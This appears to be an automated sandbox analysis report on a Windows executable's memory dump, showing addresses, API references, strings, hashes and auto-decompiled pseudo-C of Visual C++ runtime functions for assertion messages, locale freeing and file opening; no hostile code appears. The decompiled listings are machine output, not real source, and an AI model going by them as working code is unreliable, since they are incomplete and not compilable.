0x0041f8b6
0x0041f90b
0x0041f90b
0x0041f90c
0x0041f90c
0x0041f90d
0x0041f90e
0x0041f913
0x0041f918
0x00000000
0x0041f91e
0x0041f925
0x0041f92a
0x0041f92f
0x00000000
0x0041f935
0x0041f93c
0x0041f941
0x0041f946
0x00000000
0x0041f94c
0x0041f94c
0x0041f950
0x0041f950
0x0041f953
0x0041f953
0x0041f956
0x0041f959
0x0041f960
0x0041f962
0x0041f964
0x0041f964
0x0041f967
0x0041f967
0x0041f96a
0x0041f96d
0x0041f97a
0x0041f988
0x0041f98d
0x0041f992
0x00000000
0x0041f998
0x0041f99f
0x0041f9a4
0x0041f9a9
0x00000000
0x0041f9af
0x0041f9b6
0x0041f9bb
0x0041f9c0
0x00000000
0x0041f9c6
0x0041f9c6
0x0041f9ca
0x0041f9ca
0x0041f9cd
0x0041f9cd
0x0041f9d0
0x0041f9d3
0x0041f9dc
0x0041f9dc
0x0041f9e2
0x0041f9e8
0x0041f9eb
0x0041f9eb
0x0041f9ee
0x0041f9f1
0x0041f9fc
0x0041fa03
0x0041fb09
0x00000000
0x0041fa09
0x0041fa10
0x0041fa19
0x0041fa1e
0x0041fa23
0x00000000
0x0041fa29
0x0041fa29
0x0041fa2e
0x0041fa2e
0x0041fa2f
0x0041fa30
0x0041fa35
0x0041fa3a
0x00000000
0x0041fa40
0x0041fa40
0x0041fa48
0x0041fa4d
0x0041fa52
0x00000000
0x0041fa58
0x0041fa5f
0x0041fa64
0x0041fa69
0x00000000
0x0041fa6f
0x0041fa72
0x0041fa77
0x0041fa7c
0x00000000
0x0041fa82
0x0041fa89
0x0041fa8e
0x0041fa93
0x00000000
0x0041fa99
0x0041fb1c
0x0041fb24
0x0041fb24
0x0041fa93
0x0041fa7c
0x0041fa69
0x0041fa52
0x0041fa3a
0x0041fa23
0x0041fa03
0x0041f9c0
0x0041f9a9
0x0041f992
0x0041f946
0x0041f92f
0x0041f918
0x0041f8a4
0x0041f88d
0x0041f878
0x0041f873
0x0041f7fa
0x0041f7d0
0x0041f7b9
0x0041f766
0x0041f766
0x0041f779
0x0041f781
0x0041f785
0x0041f78a
0x0041f78f
0x00000000
0x00000000
0x00000000
0x00000000
0x0041f78f
0x0041f723
0x0041f730
0x0041f735
0x0041f73a
0x00000000
0x00000000
0x00000000
0x00000000
0x0041f73a
0x0041f721
0x0041f6c8
0x0041f6b1

APIs

GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041F6F5
GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041F719

Part of subcall function 00415A87: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00416245
Part of subcall function 00415A87: ___raise_securityfailure.LIBCMT ref: 0041632C

Part of subcall function 0041A842: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0041A844
Part of subcall function 0041A842: GetCurrentProcess.KERNEL32(C0000417,?,0041370C), ref: 0041A867
Part of subcall function 0041A842: TerminateProcess.KERNEL32(00000000,?,0041370C), ref: 0041A86E

Strings

Line: , xrefs: 0041F935
<program name unknown>, xrefs: 0041F723
Program: , xrefs: 0041F6B7
..., xrefs: 0041F774, 0041F893, 0041F8E5, 0041FA29, 0041FAAC, 0041FADF
File: , xrefs: 0041F7BF
Assertion failed!, xrefs: 0041F673
For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 0041FA58
\, xrefs: 0041F816
Expression: , xrefs: 0041F9AF
(Press Retry to debug the application - JIT must be enabled), xrefs: 0041FA82

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: FeatureModulePresentProcessProcessor$CurrentFileHandleNameTerminate___raise_securityfailure
String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
API String ID: 1436480766-3261600717
Opcode ID: 2d8908fcd4a50d833e2373b137552f8f5bbe621f776ff9c2eb84c0cdebf418fb
Instruction ID: 15ae4e2e9c0e537fa61dce89ac3c955bbde7397ec99f299690bdff5b013f03ee
Opcode Fuzzy Hash: 2d8908fcd4a50d833e2373b137552f8f5bbe621f776ff9c2eb84c0cdebf418fb
Instruction Fuzzy Hash: C7C14AB1A0011676CB24AA65DC89FEB3778DFA9704F5404BFFC05D1241F638AE8AC66D

Uniqueness

Uniqueness Score: 100.00%

Function 0042E7CB, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042E7CB(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x44b7b8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E004214E2(_t46);
							E0042DB25( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E004214E2(_t47);
							E0042DFDC( *((intOrPtr*)(_t74 + 0x88)));
						}
						E004214E2( *((intOrPtr*)(_t74 + 0x7c)));
						E004214E2( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E004214E2( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E004214E2( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E004214E2( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E004214E2( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E0042E93E( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x44b900) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E004214E2(_t31);
							E004214E2( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E004214E2(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E004214E2(_t74);
			}

0x0042e7d3
0x0042e7d7
0x0042e7df
0x0042e7e8
0x0042e7ed
0x0042e7f4
0x0042e7fc
0x0042e804
0x0042e80f
0x0042e815
0x0042e816
0x0042e81e
0x0042e826
0x0042e831
0x0042e837
0x0042e83b
0x0042e846
0x0042e84c
0x0042e7ed
0x0042e84d
0x0042e855
0x0042e868
0x0042e87b
0x0042e889
0x0042e894
0x0042e899
0x0042e8a2
0x0042e8aa
0x0042e8ab
0x0042e8b1
0x0042e8b4
0x0042e8b7
0x0042e8be
0x0042e8c0
0x0042e8c4
0x0042e8cc
0x0042e8d3
0x0042e8d9
0x0042e8da
0x0042e8da
0x0042e8e1
0x0042e8e3
0x0042e8e8
0x0042e8f0
0x0042e8f5
0x0042e8f6
0x0042e8f6
0x0042e8f9
0x0042e8fc
0x0042e8ff
0x0042e902
0x0042e902
0x0042e914

APIs

_free.LIBCMT ref: 0042E804
___free_lconv_mon.LIBCMT ref: 0042E80F

Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DB42
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DB54
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DB66
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DB78
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DB8A
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DB9C
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DBAE
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DBC0
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DBD2
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DBE4
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DBF6
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DC08
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DC1A

_free.LIBCMT ref: 0042E826

Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042DFF4
Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042E006
Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042E018
Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042E02A
Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042E03C

_free.LIBCMT ref: 0042E83B
_free.LIBCMT ref: 0042E846
_free.LIBCMT ref: 0042E868
_free.LIBCMT ref: 0042E87B
_free.LIBCMT ref: 0042E889
_free.LIBCMT ref: 0042E894

Part of subcall function 0042E93E: _free.LIBCMT ref: 0042E965

_free.LIBCMT ref: 0042E8CC
_free.LIBCMT ref: 0042E8D3
_free.LIBCMT ref: 0042E8F0
_free.LIBCMT ref: 0042E908

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 4fd9495d86b1acefefae0c9eb5447267e1b4eb01c9bf6a0e97a3a554dd22282c
Instruction ID: 1ab51da35fa49306ea991a27a67ab6361ec2eacc79e175fc5891ed522f2a80ab
Opcode Fuzzy Hash: 4fd9495d86b1acefefae0c9eb5447267e1b4eb01c9bf6a0e97a3a554dd22282c
Instruction Fuzzy Hash: 8F314D31B002249BEB307A7AE985B5777E9EB10314FA4842FE498D72A1DB39EC40C718

Uniqueness

Uniqueness Score: 1.01%

Function 0042E7CB, Relevance: 19.6, APIs: 13, Instructions: 114COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042E804
___free_lconv_mon.LIBCMT ref: 0042E80F

Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DB42
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DB54
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DB66
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DB78
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DB8A
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DB9C
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DBAE
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DBC0
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DBD2
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DBE4
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DBF6
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DC08
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DC1A

_free.LIBCMT ref: 0042E826

Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042DFF4
Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042E006
Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042E018
Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042E02A
Part of subcall function 0042DFDC: _free.LIBCMT ref: 0042E03C

_free.LIBCMT ref: 0042E83B
_free.LIBCMT ref: 0042E846
_free.LIBCMT ref: 0042E868
_free.LIBCMT ref: 0042E87B
_free.LIBCMT ref: 0042E889
_free.LIBCMT ref: 0042E894

Part of subcall function 0042E93E: _free.LIBCMT ref: 0042E965

_free.LIBCMT ref: 0042E8CC
_free.LIBCMT ref: 0042E8D3
_free.LIBCMT ref: 0042E8F0
_free.LIBCMT ref: 0042E908

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,00422FA2), ref: 0042150A

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 8c2471a2ae1d2f46f240d375ff8d9539cfe4b7e664e487c42ab0bfd0fad21ae8
Instruction ID: 1ab51da35fa49306ea991a27a67ab6361ec2eacc79e175fc5891ed522f2a80ab
Opcode Fuzzy Hash: 8c2471a2ae1d2f46f240d375ff8d9539cfe4b7e664e487c42ab0bfd0fad21ae8
Instruction Fuzzy Hash: 8F314D31B002249BEB307A7AE985B5777E9EB10314FA4842FE498D72A1DB39EC40C718

Uniqueness

Uniqueness Score: 1.01%

Function 0042DC23, Relevance: 18.4, APIs: 12, Instructions: 375
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0042DC23(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				signed int _t105;
				signed int _t115;
				signed int _t117;
				signed int _t121;
				signed int _t125;
				signed int _t129;
				signed int _t133;
				signed int _t137;
				signed int _t141;
				signed int _t145;
				signed int _t149;
				signed int _t153;
				signed int _t157;
				signed int _t161;
				signed int _t165;
				signed int _t169;
				signed int _t173;
				signed int _t177;
				signed int _t181;
				signed int _t185;
				signed int _t189;
				char _t195;
				intOrPtr* _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				void* _t225;
				char* _t227;
				signed int _t228;
				signed int _t232;
				signed int _t233;
				intOrPtr _t234;
				void* _t235;
				void* _t237;
				char* _t258;

				_t225 = __edx;
				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t235 = E00420EFE(1, 0x50);
					_v8 = _t235;
					E004214E2(0);
					if(_t235 != 0) {
						_t228 = E00420EFE(1, 4);
						_v12 = _t228;
						E004214E2(0);
						if(_t228 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0x44b7b8, _t212 << 2);
								L24:
								_t237 = _v8;
								_t232 = _v16;
								 *_t237 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t237 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t237 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t237 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t237 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t232 != 0) {
									 *_t232 = 1;
								}
								goto L26;
							}
							_t233 = E00420EFE(1, 4);
							_v16 = _t233;
							E004214E2(0);
							if(_t233 != 0) {
								_t234 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t235 + 0xc; // 0xc
								_t115 = E00429F96(_t225);
								_t117 = E00429F96(_t225,  &_v28, 1, _t234, 0x14, _v8 + 0x10,  &_v28);
								_t121 = E00429F96(_t225,  &_v28, 1, _t234, 0x16, _v8 + 0x14, 1);
								_t125 = E00429F96(_t225,  &_v28, 1, _t234, 0x17, _v8 + 0x18, _t234);
								_v20 = _v8 + 0x1c;
								_t129 = E00429F96(_t225,  &_v28, 1, _t234, 0x18, _v8 + 0x1c, 0x15);
								_t133 = E00429F96(_t225,  &_v28, 1, _t234, 0x50, _v8 + 0x20, _t14);
								_t137 = E00429F96(_t225);
								_t141 = E00429F96(_t225,  &_v28, 0, _t234, 0x1a, _v8 + 0x28,  &_v28);
								_t145 = E00429F96(_t225,  &_v28, 0, _t234, 0x19, _v8 + 0x29, 1);
								_t149 = E00429F96(_t225,  &_v28, 0, _t234, 0x54, _v8 + 0x2a, _t234);
								_t153 = E00429F96(_t225,  &_v28, 0, _t234, 0x55, _v8 + 0x2b, 0x51);
								_t157 = E00429F96(_t225,  &_v28, 0, _t234, 0x56, _v8 + 0x2c, _v8 + 0x24);
								_t161 = E00429F96(_t225);
								_t165 = E00429F96(_t225,  &_v28, 0, _t234, 0x52, _v8 + 0x2e,  &_v28);
								_t169 = E00429F96(_t225,  &_v28, 0, _t234, 0x53, _v8 + 0x2f, 0);
								_t173 = E00429F96(_t225,  &_v28, 2, _t234, 0x15, _v8 + 0x38, _t234);
								_t177 = E00429F96(_t225,  &_v28, 2, _t234, 0x14, _v8 + 0x3c, 0x57);
								_t181 = E00429F96(_t225,  &_v28, 2, _t234, 0x16, _v8 + 0x40, _v8 + 0x2d);
								_push(_v8 + 0x44);
								_push(0x17);
								_push(_t234);
								_t185 = E00429F96(_t225);
								_t189 = E00429F96(_t225,  &_v28, 2, _t234, 0x50, _v8 + 0x48,  &_v28);
								if((E00429F96(_t225,  &_v28, 2, _t234, 0x51, _v8 + 0x4c, 2) | _t115 | _t117 | _t121 | _t125 | _t129 | _t133 | _t137 | _t141 | _t145 | _t149 | _t153 | _t157 | _t161 | _t165 | _t169 | _t173 | _t177 | _t181 | _t185 | _t189) == 0) {
									_t227 =  *_v20;
									while(1) {
										_t195 =  *_t227;
										if(_t195 == 0) {
											break;
										}
										_t61 = _t195 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t195 != 0x3b) {
												L16:
												_t227 = _t227 + 1;
												continue;
											}
											_t258 = _t227;
											do {
												_t196 = _t258 + 1;
												_t222 =  *_t196;
												 *_t258 = _t222;
												_t258 = _t196;
											} while (_t222 != 0);
											continue;
										}
										 *_t227 = _t221;
										goto L16;
									}
									goto L24;
								}
								E0042DB25(_v8);
								E004214E2(_v8);
								E004214E2(_v12);
								E004214E2(_v16);
								goto L4;
							}
							E004214E2(_t235);
							E004214E2(_v12);
							L7:
							goto L4;
						}
						E004214E2(_t235);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t232 = 0;
					_v12 = 0;
					_t237 = 0x44b7b8;
					L26:
					_t105 =  *(_t209 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E004214E2( *(_t209 + 0x88));
							E004214E2( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t232;
					 *(_t209 + 0x88) = _t237;
					return 0;
				}
			}

0x0042dc23
0x0042dc2c
0x0042dc33
0x0042dc36
0x0042dc39
0x0042dc42
0x0042dc64
0x0042dc68
0x0042dc6b
0x0042dc75
0x0042dc88
0x0042dc8c
0x0042dc8f
0x0042dc99
0x0042dcab
0x0042df3e
0x0042df3f
0x0042df41
0x0042df49
0x0042df4d
0x0042df52
0x0042df5d
0x0042df69
0x0042df75
0x0042df81
0x0042df87
0x0042df8b
0x0042df8d
0x0042df8d
0x00000000
0x0042df8b
0x0042dcba
0x0042dcbe
0x0042dcc1
0x0042dccb
0x0042dcdf
0x0042dce5
0x0042dcf2
0x0042dd09
0x0042dd20
0x0042dd37
0x0042dd47
0x0042dd54
0x0042dd6b
0x0042dd82
0x0042dd99
0x0042ddb3
0x0042ddca
0x0042dde1
0x0042ddf8
0x0042de12
0x0042de29
0x0042de40
0x0042de57
0x0042de71
0x0042de88
0x0042de95
0x0042de96
0x0042de98
0x0042de9f
0x0042deb6
0x0042deda
0x0042df08
0x0042df17
0x0042df17
0x0042df1b
0x00000000
0x00000000
0x0042df0c
0x0042df0c
0x0042df12
0x0042df21
0x0042df16
0x0042df16
0x00000000
0x0042df16
0x0042df23
0x0042df25
0x0042df25
0x0042df28
0x0042df2a
0x0042df2c
0x0042df2e
0x00000000
0x0042df32
0x0042df14
0x00000000
0x0042df14
0x00000000
0x0042df1d
0x0042dee0
0x0042dee6
0x0042deef
0x0042def8
0x00000000
0x0042defd
0x0042dcce
0x0042dcd7
0x0042dca1
0x00000000
0x0042dca1
0x0042dc9c
0x00000000
0x0042dc9c
0x0042dc77
0x00000000
0x0042dc4c
0x0042dc4c
0x0042dc4e
0x0042dc51
0x0042df8f
0x0042df8f
0x0042df97
0x0042df99
0x0042df99
0x0042dfa1
0x0042dfa6
0x0042dfaa
0x0042dfb2
0x0042dfba
0x0042dfc0
0x0042dfaa
0x0042dfc4
0x0042dfc9
0x0042dfcf
0x00000000
0x0042dfcf

APIs

Part of subcall function 00420EFE: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00425351,00000001,00000364,00000005,000000FF,?,00416C35,?,?,1FFFFFFF,00000008), ref: 00420F3F

_free.LIBCMT ref: 0042DC6B

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

_free.LIBCMT ref: 0042DC8F
_free.LIBCMT ref: 0042DC9C
_free.LIBCMT ref: 0042DCC1
_free.LIBCMT ref: 0042DCCE
_free.LIBCMT ref: 0042DCD7

Part of subcall function 00429F96: _free.LIBCMT ref: 0042A001
Part of subcall function 00429F96: GetLastError.KERNEL32(?,?,?,?,00000000), ref: 0042A03C
Part of subcall function 00429F96: _free.LIBCMT ref: 0042A0AB

___free_lconv_mon.LIBCMT ref: 0042DEE0

Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DB42
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DB54
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DB66
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DB78
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DB8A
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DB9C
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DBAE
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DBC0
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DBD2
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DBE4
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DBF6
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DC08
Part of subcall function 0042DB25: _free.LIBCMT ref: 0042DC1A

_free.LIBCMT ref: 0042DEE6
_free.LIBCMT ref: 0042DEEF
_free.LIBCMT ref: 0042DEF8
_free.LIBCMT ref: 0042DFB2
_free.LIBCMT ref: 0042DFBA

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: _free$ErrorHeapLast$AllocateFree___free_lconv_mon
String ID:
API String ID: 428755336-0
Opcode ID: 82658cb3267c58957d14b608f4c1e4a7c2fe8ab3fa327854911555a9388a8b87
Instruction ID: 16d66acd6991994298552a1f7a72d94574f7621398115d6419dea69215e92077
Opcode Fuzzy Hash: 82658cb3267c58957d14b608f4c1e4a7c2fe8ab3fa327854911555a9388a8b87
Instruction Fuzzy Hash: 8CC16872F40214AFEB20DB99DD82FEE77F8AF08704F55416AFA05EB282D6749D408758

Uniqueness

Uniqueness Score: 1.01%

Function 00433C65, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 274
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00433C65(void* __ecx, void* __eflags, void* __fp0, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				signed int* _t186;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				char _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;
				signed int _t289;

				_t290 = __fp0;
				_t263 = E004339AD(__ecx, __fp0,  &_v72, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v48, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t264 = _t263 | 0xffffffff;
				_t288 = _v36 - _t264;
				if(_v36 != _t264) {
					_t114 = E0042D921(_t188, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(__eflags != 0) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t196 = 0;
						_t253 = E00433918();
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E0042D86A(_t196, _t253,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v5 = _t241;
								_v48 = _t241;
								 *( *((intOrPtr*)(0x44df78 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x44df78 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v48, _t205 << 2);
									_t134 = E004336C3(_t189,  &_v48 + _t205 + _t205,  &_v48, _t290);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x44df78 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v6;
										 *( *((intOrPtr*)(0x44df78 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x44df78 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x44df78 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0x44df78 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v44;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
